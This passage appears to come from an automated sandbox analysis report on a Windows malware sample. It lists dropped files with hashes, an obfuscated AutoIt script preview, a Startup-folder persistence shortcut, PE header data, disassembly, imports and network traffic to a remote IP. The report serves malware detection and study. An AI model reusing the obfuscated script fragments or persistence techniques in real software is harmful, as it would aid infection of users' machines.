                                                                                            • Filename: tDDFLIR3f6.exe, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exe, Detection: malicious, Browse
                                                                                            • Filename: 3vQD6TIYA1.exe, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Trojan.Coins.Win32.5986.15363.exe, Detection: malicious, Browse
                                                                                            • Filename: XN123gfQJQ.exe, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exe, Detection: malicious, Browse
                                                                                            • Filename: V7UnYc7CCN.exe, Detection: malicious, Browse
                                                                                            • Filename: FileZilla_3.53.1_win64_sponsored-setup.exe, Detection: malicious, Browse
                                                                                            • Filename: FileZilla_3.53.1_win64_sponsored-setup.exe, Detection: malicious, Browse
                                                                                            • Filename: 1Nqs1iTfMz.exe, Detection: malicious, Browse
                                                                                            • Filename: lv.exe, Detection: malicious, Browse
                                                                                            • Filename: IaYA2iuuIV.exe, Detection: malicious, Browse
                                                                                            • Filename: Ypp2jYNpAI.exe, Detection: malicious, Browse
                                                                                            • Filename: 1k2RZQrqkh.exe, Detection: malicious, Browse
                                                                                            • Filename: JspemsXAtV.exe, Detection: malicious, Browse
                                                                                            • Filename: 3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exe, Detection: malicious, Browse
                                                                                            • Filename: hLOTlwUNup.exe, Detection: malicious, Browse
                                                                                            • Filename: vZzN8hoqnD.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\tZVdZWix.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):4.839614648336088
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:jBJXv2M3qWEu71/Ak:jBJ/X3qWuk
                                                                                            MD5:CB000FE22CA02940975C83D7A5A449DD
                                                                                            SHA1:B91AF48EB5649291C6BA81AA165D2FCABC604379
                                                                                            SHA-256:8A45D5858030ECB58579E170823CC38F28C2EACAC2CB0BD7C9071FB8019C816B
                                                                                            SHA-512:A02B88B0D57CCE8D4C7B371BF72C6CE248912818DDA102E137B9B446C3B4A569A211826D86243455F7A0695151628D23BD0B434569D35BFC207E649015305E90
                                                                                            Malicious:false
                                                                                            Preview: Windows 10 Pro..user..Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..
                                                                                            C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Eri.eps
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):643498
                                                                                            Entropy (8bit):5.865429553014856
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:e+5CTU487C6isxUQAOCCcCxgwAkovm8Jg:FC7g/
                                                                                            MD5:890D1D73257820D0C6792F9A8DC59479
                                                                                            SHA1:20669EA7EE51E51794D0F43009AA9ABB570F37A8
                                                                                            SHA-256:8707B27193359B0DDAE772CF837B182770B4181FCCCD3E64903E1AE9E8955B0C
                                                                                            SHA-512:EE6DB57CD22B243F5B0FD8FBC405CC1F1DED92442F47A98EFB10FACD6F5E73F6B5984685704A1A0B29D514F3649C63198369D6D7DB5A4E731C1C5941E28B8E76
                                                                                            Malicious:false
                                                                                            Preview: $Oglxfly = SAQxWduwfjjO("72_108_114_103_70_77_74_110_83_120_115_75_100_117_104_122_76_75_106_114_92_91_107_109_77_84_121_85_93",3)..#NoTrayIcon....Func NDfgImaDSTkyExXRlic($waFHc,$UkalIvxAV,$ZNbbgfFVT,$XIlfhgSX,$XISiBn,$AICJlT,$ZlzY)..Local $qMCRqkw = 'XzDvuXliGWZWPWalntHltTdalsXVdfAjdbKoyONtOrNeAQhrzszWEQYtrlkOqgRdcMFskpyJdDcqygRxrTCYVDImnGyUCYrAjbGOlVSpjKFwxXY'...$YINzB = 158..$jNMFqxSUgdx = 81..While ((5912-5911)*5637)..Switch $YINzB..Case 154....$VsBxuMPPWOuAvMZRF = Execute(SAQxWduwfjjO("75_90_113_103_43_80_82_83_87_124_125_115_76_109_110_86_122_90_108_123_125_44",3))..$87 = 151..For $TVFHMqZMJEJTfXJExhtRGZQkbtNOTIHBmWWOshEBxxrkuenpRR = 5 To 22..Local $DbkWFyxFEWwdVOLi = 'IXrVgoBegYIyiWElrpdDXAgPeHfQKwaJkYjdrMggKTduM'..Local $VsBxuMPPWOuAvMZRF = Execute(SAQxWduwfjjO("77_123_114_127_110_80_110_125_92_110_123_114_106_117_49_48_122_107_130_91_79_129_78_130_120_82_48_50",9)), $TGTLsjGYT = 'JgudUeTrpieBkgzEpMfHTtHPTHx'..Next....$YINzB = $YINzB + 1..Case 155....$tAOHhdpZBLsLwYB = Execute
                                                                                            C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Notti.eps
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):943928
                                                                                            Entropy (8bit):6.625737512696406
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                                            MD5:D6B3543F741FC22A9309AD4328B977B0
                                                                                            SHA1:F75ACE4374CB7B7BD55F44D42B39223045118156
                                                                                            SHA-256:A4B31A2BB4FAA628493F11AF21D9AEF7DC2536052131351DEC1F45826A355B23
                                                                                            SHA-512:90FBE24B456230E7795A2CAD239852239D3384051943D3D260195BFA2D2EFE964324F198F0F2C21A5FF97ADCE7A488005478D2E9B05AA2DA8506263C1A99B1D9
                                                                                            Malicious:false
                                                                                            Preview: NfIeItKcjkOKepYZCKFMkXrWzIisyYsXhQiMykUBGlqQrbUBrzKTMfJQkLIqWadhUQvkejTdQtuqWhTWOFgLgbkYudAzCUEhUMWjqInRmzrHoJTYSLjdtEYvFnyLLmOVmSupsGWyibjVxDPb........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................
                                                                                            C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Scoprirvi.eps
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):117111
                                                                                            Entropy (8bit):5.772481497687213
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:/lhqr/D24tnYhxKd/EeTgxxd1lM7OXDttKkGn22S:/cHJBEe0PlM7OXDtMki25
                                                                                            MD5:FBD2CB54556AEC9D3F86DA354FDE67DB
                                                                                            SHA1:5F3354B1D49A24BC503805BA39B32AC8D394DC74
                                                                                            SHA-256:1E974F313E1D3235CA79FC159AE734C8E3533C48C4E508C0441C73071D93398E
                                                                                            SHA-512:F6473EE4B2C5C86A1300311720942E8454B2D8D2706FFEC16D3731466BC59B800B3A44B5FE10458C35CB32F5BBB8B179C2FF1FC7B6E7AF5D6FE18F002007FD59
                                                                                            Malicious:false
                                                                                            Preview: iJsMaUmvYKRxZIXVASlVNnICLcRxiJHGXAIgvoHVsINqlIoQyCTtDvEJqOwW=tfgelvnqImalfEtKIaehwfEQDrBVYgHuKRjznXZjJQvrBTgSAYsvYJePKnnuVDwxSkAbsLjKaPDlSBgKPIcqWli..PbIZnTsuPekfzQAPMHtouRWppOsjoqbHrmHUejjnnbcQfYsYiF=fyYUYAmQKCtYOEDjTpGMmcFKIcuTkbayCLoCtEIzDvBWzmGjMMbPBTOUmgkCxFFjpZcecwifAhprTJdpPTinZDDIXgeQauYYRgMxrDQKEoggJLqQY..NAbuhGcMyiZsWxgkjEWWukrvTRffZkhkSdabAKwuYdnJLhkTZnn=UwWCbqjcsuNTTNmFeQKBCQXPMxLGFcdAMRsQxQqmbGPSCEPYNGRoNXTtruPefGPVPhuevJlkQkrWqyhoFMSZEiMPXjMgqXlRRTegnMBtcFaCTXrYSHbCNPsIAsypWWkSqjy..rYKSkNDZPlWqpOvzmHrwCxOuHaomzmBHSVUTXFsZjsSdxyqiASzaot=JlDlSFtFdIgihTCcUdtPlBbLCsqYByomOdkJxxnxiMBIuXNgXvnetfxiNRIAFyrlmPzWITwmRKHbZPFEEMwyHucmWtVDLXPwJsodDQGtxZlxHWiXkrWStXDzxUqDXnNTUGOIGgqNuWKIVwRZWYsIwWW..OPWJQeiWkdmwomdWroMohVbzeqGZuySYJrURssWrPOvFCQRbHxESpOnSaDHQciPynAstEmF=kIznnRRkpoaMAZOVEwmOKuHHZsiwmMSiPTGAcZxAMcGhPeEnLvmDZRwywLmuKPLvflWHzhAFGZwgmxRWNJfrjfoYRBmJAgPXJlXFyWybWUWqPNFGTCzwAIpqeYQROQtaltEfbjQQERisaiorWSQYUNbwqWDiyhJyQEQLofp..MDbIBRIUPMUVqunvHDgAJIKdowBNsbVGJpksdOmogJszaNyKux
                                                                                            C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Velavi.eps
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):143360
                                                                                            Entropy (8bit):7.998492792403378
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:SCPHcI7djZ1o5BXaFIykBEt4RjkhFnRZB:SCP8I7tZureIyketSm
                                                                                            MD5:E38AF13EE7173016561D1C579C8C7386
                                                                                            SHA1:37670C3B7C3B51B9953151F64DE25015866569CE
                                                                                            SHA-256:5D8836646F03358AF167CF96A4A27A6C3C1415E9AB61E4F3A65192ECB9C02F09
                                                                                            SHA-512:E4BDEAFEA2551ADFB7B3FA7F5D9CC275D956004CC7A123532B8A7B027D431FE93328A60D0C26670EE75A179ACB3A6CF8AB98BFF34B46DA968EA8A54B06553456
                                                                                            Malicious:false
                                                                                            Preview: ..Y..:WA'.....]x#....d..r.(....Fi....W.."I....[b.o.....|...".V/.x.].R..9.w.Z...&.x.. .z.h]..g..G.v.X...f..4&..H/2e.....A.......A.s./c.5.........<(B/..R.u.....Lr.O....NGIb...P.LAJ...B..<..x.~.u.<|U..p4`a...e.=)@Z..+|...N..#a....#B...1.Nq.,p.N>.V...nJ TCm.]....*`.&.B.j..Cq...`..*.....h.)>.........&...~.....F.p.`.....T.....T......R.Cp.m.1.fe. .....%HvKkB... .C......<x]..W..m....G&_.Q[Q.+"X.86....$!....ul....n..QV..R..a...*J3:.::m..5%X....c...0..7...:...J8.x....\.........+1.1.V.8).S.......D.p.hd..Pl0.;.a.">@b..g...3.......%.L.B]g<.O..|.%.y..>....D.r..1#72&:}.{.A.+..t.6Q.g.,n..........}........).8..d.....(.....!@c....N.8x.fk.F..........g..\h.2.7...(.z.^....ve.3.g....?...,...G....lsAc...g.D.....D..j.A.,.$.r.e..)....;(n....Vq.B.~....;.F.X|lL}....j..U..&h .w...J..R9.?......j...(...{......x..`..Y..<s.\......k.G.i..Q=..\e......%............#Hkf}q...rUjO.K..u.....l...>...0QQ....9...Y....H....H...CU..Hr....3%...a.Q...W. <....v..2.(..n+.....g...S-...%
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\4.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Mon Apr 12 21:12:24 2021, mtime=Mon Apr 12 21:12:24 2021, atime=Mon Apr 12 01:45:28 2021, length=328704, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):938
                                                                                            Entropy (8bit):4.982237865006329
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8N27FZ3bCHmrdQS1xrIAmwdnC22rr/tm:887F5CHmZhrvmynj2rr/t
                                                                                            MD5:2568495C3650D88B8AEBB2F17FFBDE83
                                                                                            SHA1:1F26FAA203907572417BA7E59506B09BDEC199C6
                                                                                            SHA-256:A851F2EF4962EF136FEB61809B3B1CFC398A8107AACE3D0AED1ED386AA5C4839
                                                                                            SHA-512:9DFA9B359B3D67CD346C563414E9A0C8570C26B083600A2F3B8912E70F48F1DF5E63D45834BD2868028C9C907A00709476E445A89769E77566CABF404F20DE2D
                                                                                            Malicious:false
                                                                                            Preview: L..................F.... ...x!.../....../....z.E/............................:..DG..Yr?.D..U..k0.&...&...........-....".8...-[.../......t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..R`......Y.....................R..A.p.p.D.a.t.a...B.V.1......Rh...Roaming.@.......NM..Rm......Y....................!..R.o.a.m.i.n.g.....`.1......R....SMARTC~1..H......R...R......0[........................S.m.a.r.t. .C.l.o.c.k.....j.2......R.. .SMARTC~1.EXE..N......R...R......1[........................S.m.a.r.t.C.l.o.c.k...e.x.e.......i...............-.......h.............<......C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe....S.m.a.r.t. .C.l.o.c.k.).....\.....\.....\.....\.....\.S.m.a.r.t. .C.l.o.c.k.\.S.m.a.r.t.C.l.o.c.k...e.x.e.`.......X.......048707...........!a..%.H.VZAj...`jt.+........W...!a..%.H.VZAj...`jt.+........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                            C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                            Process:C:\Users\user\AppData\Local\Temp\New Feature\4.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):328704
                                                                                            Entropy (8bit):6.796040916616973
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:TTxj9L+GunafsHK8zIjIVp20bhPeCPHhNX:TTxJzBsq8kJ07H
                                                                                            MD5:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            SHA1:01217AD74FDCFE07F1EA0FE296AB4D2B809CD581
                                                                                            SHA-256:02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
                                                                                            SHA-512:F4D515C7E920B30E7E12EB6BC77E0446F31286259804BAEFD1B33A338CFF9DB6E688173E59A7110F11298199646F31EEC8934E502F130AF5FC765E02FC543186
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....^_...........................=-............@..........................0....../z..............................Pf..j....[..<....p..0...........................................................hJ..@............ ...............................text...?........................... ..`.data...<..........................@....yiku..............................@....padozocy...........................@....new.....F... ...H..................@..@.rsrc...0....p.......X..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................
                                                                                            \Device\ConDrv
                                                                                            Process:C:\Windows\SysWOW64\makecab.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):754
                                                                                            Entropy (8bit):4.501722289958999
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:xYV1JnceSZceEd0xeeQTEFhaoYwRwGHaqeS6JozUYae6dhmraMy5V:xYDBcDZcTPIjZYwWqeMUY2kHGV
                                                                                            MD5:EB265F56777BD576D478648053D18075
                                                                                            SHA1:562D01958A377C1C7343621F569D65E5D85E7E27
                                                                                            SHA-256:64A27E60DFB2E033099969449AF134D587A47B99036531EBC6FA0F0BF078D483
                                                                                            SHA-512:5C2576540026F4C56F1A962919F45967BE9C25CD3D06C188BC2390F195EEE78F1C9C0414C3A2B5CDC30EFC955B284B5921308BA3B06DC2DB8D1B133F60C18F3F
                                                                                            Malicious:false
                                                                                            Preview: Cabinet Maker - Lossless Data Compression Tool....MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]..MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...].... source File to compress... destination File name to give compressed file. If omitted, the.. last character of the source file name is replaced.. with an underscore (_) and used as the destination... /F directives A file with MakeCAB directives (may be repeated). Refer to.. Microsoft Cabinet SDK for information on directive_file... /D var=value Defines variable with specified value... /L dir Location to place destination (default is current directory)... /V[n] Verbosity level (1..3)...

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.647769237525862
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                            • Clipper DOS Executable (2020/12) 0.02%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • VXD Driver (31/22) 0.00%
                                                                                            File name:SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File size:749568
                                                                                            MD5:5e3189812e802c0fd68ce592cb1e1999
                                                                                            SHA1:38552111d3001f4998ab85408601873897653360
                                                                                            SHA256:f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
                                                                                            SHA512:9a8d2d68feebd8b9658c4b7e5b32221112a9449b30524a36757e6022686414d714f7dc680db48fdc93dc357849604631fddf26b55204584c871367f204aee4d3
                                                                                            SSDEEP:12288:hDTY0MImKSz4jaZb47XE2DUNLgjgV5cWdoGAM3GDoaCBdBaMDKif2QhR2I:dNMIOz42qDEbBV5RJ26DKO2JI
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......]...........

                                                                                            File Icon

                                                                                            Icon Hash:8692f0c4c4ccb2ce

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x402d3b
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x5DD3AB03 [Tue Nov 19 08:42:43 2019 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:0
                                                                                            File Version Major:5
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:4cc8b588252cad91c39726b15504331a

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007F63A4EA565Ch
                                                                                            jmp 00007F63A4E9D10Eh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                            test ecx, 00000003h
                                                                                            je 00007F63A4E9D2B6h
                                                                                            mov al, byte ptr [ecx]
                                                                                            add ecx, 01h
                                                                                            test al, al
                                                                                            je 00007F63A4E9D2E0h
                                                                                            test ecx, 00000003h
                                                                                            jne 00007F63A4E9D281h
                                                                                            add eax, 00000000h
                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                            mov eax, dword ptr [ecx]
                                                                                            mov edx, 7EFEFEFFh
                                                                                            add edx, eax
                                                                                            xor eax, FFFFFFFFh
                                                                                            xor eax, edx
                                                                                            add ecx, 04h
                                                                                            test eax, 81010100h
                                                                                            je 00007F63A4E9D27Ah
                                                                                            mov eax, dword ptr [ecx-04h]
                                                                                            test al, al
                                                                                            je 00007F63A4E9D2C4h
                                                                                            test ah, ah
                                                                                            je 00007F63A4E9D2B6h
                                                                                            test eax, 00FF0000h
                                                                                            je 00007F63A4E9D2A5h
                                                                                            test eax, FF000000h
                                                                                            je 00007F63A4E9D294h
                                                                                            jmp 00007F63A4E9D25Fh
                                                                                            lea eax, dword ptr [ecx-01h]
                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                            sub eax, ecx
                                                                                            ret
                                                                                            lea eax, dword ptr [ecx-02h]
                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                            sub eax, ecx
                                                                                            ret
                                                                                            lea eax, dword ptr [ecx-03h]
                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                            sub eax, ecx
                                                                                            ret
                                                                                            lea eax, dword ptr [ecx-04h]
                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                            sub eax, ecx
                                                                                            ret
                                                                                            mov edi, edi
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 20h
                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000008h
                                                                                            pop ecx
                                                                                            mov esi, 03E09300h
                                                                                            lea edi, dword ptr [ebp-20h]
                                                                                            rep movsd
                                                                                            mov dword ptr [ebp-08h], eax
                                                                                            mov eax, dword ptr [ebp+0Ch]
                                                                                            pop edi
                                                                                            mov dword ptr [ebp-04h], eax
                                                                                            pop esi
                                                                                            test eax, eax

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3a0d6600x58.new
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3a0cb1c0x3c.new
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0e0000x1688.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a100000x19e4.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a0ba700x40.new
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x3a090000x1f0.new
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000xa543f0xa5600False0.886749751984data7.87132737384IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .data0xa70000x395e23c0x1c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .hejus0x3a060000x10x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .tiyovo0x3a070000x11790x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .new0x3a090000x46b80x4800False0.372341579861data5.47508048566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x3a0e0000x16880x1800False0.659016927083data5.69317128531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x3a100000x92ac0x9400False0.147434543919data1.76902995344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x3a0e1f00x10a8data
                                                                                            RT_STRING0x3a0f4980xe6data
                                                                                            RT_STRING0x3a0f5800x106data
                                                                                            RT_ACCELERATOR0x3a0f2b00x18data
                                                                                            RT_GROUP_ICON0x3a0f2980x14data
                                                                                            RT_VERSION0x3a0f2d80x1c0data
                                                                                            None0x3a0f2c80xadata

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllExitProcess, RemoveVectoredExceptionHandler, FindResourceA, WriteConsoleOutputCharacterA, SystemTimeToTzSpecificLocalTime, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, CancelWaitableTimer, LockFile, SetTapeParameters, GetCompressedFileSizeW, FindResourceExA, GetLocaleInfoW, SizeofResource, SetSystemTimeAdjustment, GetFileAttributesA, GetExitCodeProcess, GetAtomNameW, GetTimeZoneInformation, GetEnvironmentVariableA, GlobalUnlock, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, SetLastError, OpenWaitableTimerW, LocalAlloc, SetConsoleCtrlHandler, SetConsoleOutputCP, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, VirtualProtect, GetFileTime, LocalFree, SetFileAttributesW, LocalFileTimeToFileTime, SetEnvironmentVariableA, CompareStringW, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, HeapDestroy, GetModuleHandleW, Sleep, GetProcAddress, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, FreeLibrary, InterlockedExchange, LoadLibraryA, MultiByteToWideChar, CloseHandle, CreateFileA, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA
                                                                                            USER32.dllGetMonitorInfoA

                                                                                            Exports

                                                                                            NameOrdinalAddress
                                                                                            Coruso10x49f4f0
                                                                                            Gorgeous20x49f500

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            InternalNamesgalimatimod
                                                                                            FileVersions7.0.2.54
                                                                                            LegalCopyrightsWsekde
                                                                                            ProductVersions7.0.21.21
                                                                                            Translation0x0129 0x049b

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            04/12/21-15:12:19.991469ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 12, 2021 15:12:16.512828112 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.554418087 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.554569006 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.555598021 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.555807114 CEST4971780192.168.2.58.211.1.15
                                                                                            Apr 12, 2021 15:12:16.596908092 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.596929073 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.596937895 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.596945047 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.596991062 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.597033978 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.597116947 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.597130060 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.597191095 CEST80497178.211.1.15192.168.2.5
                                                                                            Apr 12, 2021 15:12:16.597201109 CEST80497178.211.1.15192.168.2.5
